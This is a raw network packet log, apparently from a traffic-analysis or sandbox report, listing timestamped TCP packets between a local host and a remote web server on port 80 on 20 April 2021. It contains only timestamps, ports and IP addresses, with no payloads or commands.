                                                                Apr 20, 2021 22:59:12.357070923 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.357537031 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.357568026 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.357629061 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.358566999 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.358601093 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.358673096 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.359720945 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.359767914 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.359838009 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.361216068 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.361253977 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.436501980 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.436527967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.437273979 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.437300920 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.437324047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.437334061 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.437372923 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.438074112 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438101053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438127041 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438164949 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.438915014 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438950062 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438976049 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.438987017 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.439022064 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.439640045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.439667940 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.439693928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.439745903 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.440437078 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.440470934 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.440495968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.440512896 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.440558910 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.441186905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.441219091 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.441242933 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.441308975 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.441936970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.441967010 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.441991091 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.442011118 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.442045927 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.442701101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.442732096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.442755938 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.442821026 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.443428040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.443459034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.443481922 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.443510056 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.443552971 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.444149017 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.444394112 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.444422007 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.444443941 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.444463968 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.444499016 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.445159912 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.445636034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.445664883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.445688963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.445699930 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.445745945 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.446059942 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.446094990 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.446120977 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.446141958 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.446165085 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.446202040 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.447040081 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.447346926 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.447375059 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.447398901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.447418928 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.447448969 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.447963953 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.447997093 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448020935 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448044062 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448080063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.448113918 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.448899031 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448929071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448951006 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.448977947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.449007988 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.449052095 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.449850082 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.449879885 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.449903965 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.449928045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.449961901 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.450000048 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.450711966 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.450742960 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.450767040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.450789928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.450826883 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.450861931 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.451601028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.451620102 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.451636076 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.451652050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.451682091 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.451735973 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.452492952 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.452511072 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.452531099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.452548027 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.452615023 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.453344107 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.453362942 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.453377962 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.453413963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.453425884 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.453460932 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.454236984 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.454253912 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.454272032 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.454289913 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.454309940 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.454341888 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.455089092 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.455110073 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.455127001 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.455143929 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.455208063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.455970049 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.455988884 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456005096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456022978 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456089020 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.456846952 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456865072 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456881046 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456898928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.456923008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.456954956 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.457725048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.457745075 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.457760096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.457779884 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.457799911 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.457843065 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.458568096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.458585978 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.458602905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.458620071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.458655119 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.458688974 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.459451914 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.459470034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.459485054 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.459501028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.459527969 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.459558010 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.460341930 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.460360050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.460372925 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.460393906 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.460418940 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.460458994 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.461198092 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.461230040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.461251974 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.461277008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.461333990 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.462047100 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462078094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462099075 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462121964 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462162971 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.462203979 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.462933064 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462968111 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.462991953 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463031054 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463036060 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.463082075 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.463808060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463845968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463876009 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463911057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.463932037 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.463968992 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.464668036 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.464699984 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.464720964 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.464747906 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.464752913 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.464795113 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.465359926 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.465419054 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.465451002 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.465471983 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.465481043 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.465512037 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.465522051 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.466192007 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.466228008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.466257095 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.466259003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.466290951 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.466304064 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.466320038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.466373920 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.467020988 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467060089 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467087984 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467119932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467132092 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.467148066 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467170954 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.467864037 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467900038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467931986 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.467933893 CEST4970280192.168.2.7172.67.220.147
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2021 22:59:12.467963934 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.467993975 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.467998981 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.468044996 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.468720913 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.468761921 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.468794107 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.468842030 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.468941927 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.468981028 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469003916 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.469513893 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469552040 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469583988 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469588995 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.469615936 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469631910 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.469649076 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.469703913 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.470403910 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.470446110 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.470478058 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.470504045 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.470519066 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.470532894 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.470556974 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.471200943 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.471239090 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.471268892 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.471275091 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.471298933 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.471313953 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.471330881 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.471385956 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.472239017 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.472275019 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.472305059 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.472335100 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.472362995 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.472368956 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.472377062 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.474410057 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.474440098 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.474463940 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.474488020 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.474509954 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.474514961 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.474545956 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.474606037 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.475646019 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.475675106 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.475706100 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.475728035 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.475749969 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.475769043 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.475817919 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.478087902 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478115082 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478147030 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478167057 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478167057 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.478188992 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478202105 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.478213072 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.478234053 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.479706049 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479728937 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479751110 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479773045 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479779959 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.479794979 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479800940 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.479816914 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.479837894 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.481374979 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481415033 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481435061 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481456995 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481478930 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.481481075 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481508017 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481534958 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.481822968 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481847048 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481868029 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481873035 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.481889009 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481908083 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.481909990 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481931925 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.481944084 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.482831001 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.482855082 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.482876062 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.482882977 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.482898951 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
